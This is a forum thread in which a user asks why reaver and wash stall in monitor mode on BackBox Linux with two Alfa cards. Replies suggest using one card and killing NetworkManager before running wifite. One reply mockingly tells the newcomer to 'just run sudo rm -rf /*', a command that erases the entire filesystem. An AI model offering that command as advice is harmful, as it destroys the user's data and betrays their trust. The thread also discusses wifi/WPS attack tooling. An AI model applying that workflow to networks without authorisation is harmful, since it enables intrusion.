hi all, i run two alfa cards both which work great with Backbox. but while i can get one connected online and have the other work inside wifite proper, when i turn it into monitor mode and try to run wash or reaver it does nothing and stalls. i would love to get this to work because my computer is my only source of entertainment and would love to learn linux while online. if anyone can explain why wifite can create a monitor mode and work but mine fails i would be deeply appreciative, i will post some information in hopes someone can understand where i went wrong, i've been at it for two days.

wlan3      Atheros AR9271   ath9k - [phy3]
wlan0      Realtek RTL8187L   rtl8187 - [phy4]
mon0      Realtek RTL8187L   rtl8187 - [phy4]

this is it working
PID   Name
21175   NetworkManager
21295   wpa_supplicant
24408   dhclient
Process with PID 24408 (dhclient) is running on interface wlan3
Process with PID 9463 (reaver) is running on interface mon0

this is it stalling when i make mon1 :(

PID   Name
21575   NetworkManager
21595   wpa_supplicant
24408   dhclient
Process with PID 24408 (dhclient) is running on interface wlan3

the connection dies when killing process's on wlan3 and nothing works then either in my mon0, is there a reason wifite and run both and not me? i'm lost, thank you guys...

Hi,

1. Don't run all that monitor interfaces in same time.
2. Kill network manager airmon-ng check kill but look if network manager comes back, and kill him again with same command.

Then you are ready for wifite. Wash is 2nd story, check forum.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

Monitor mode is a feature that NIC must have to do this kind of "job". Here [1] what mon mode means... You should be not connected to your network while you are using monitor mode.

Hi,

First use only one card. When you run attack, that is only function that your system need to do. That is what we call "hacker patience".

Have fun.

You can not be connected and run the attack at the same time! Read somethings about wireless attack before using any tools!

e11iott,

We know it's possible, that is not the question, but we try to make things simple, like that somebody from community can help you. We are not in same room with you, and we are not on power to test all possible scenarios on our side. Small thank you is ok.
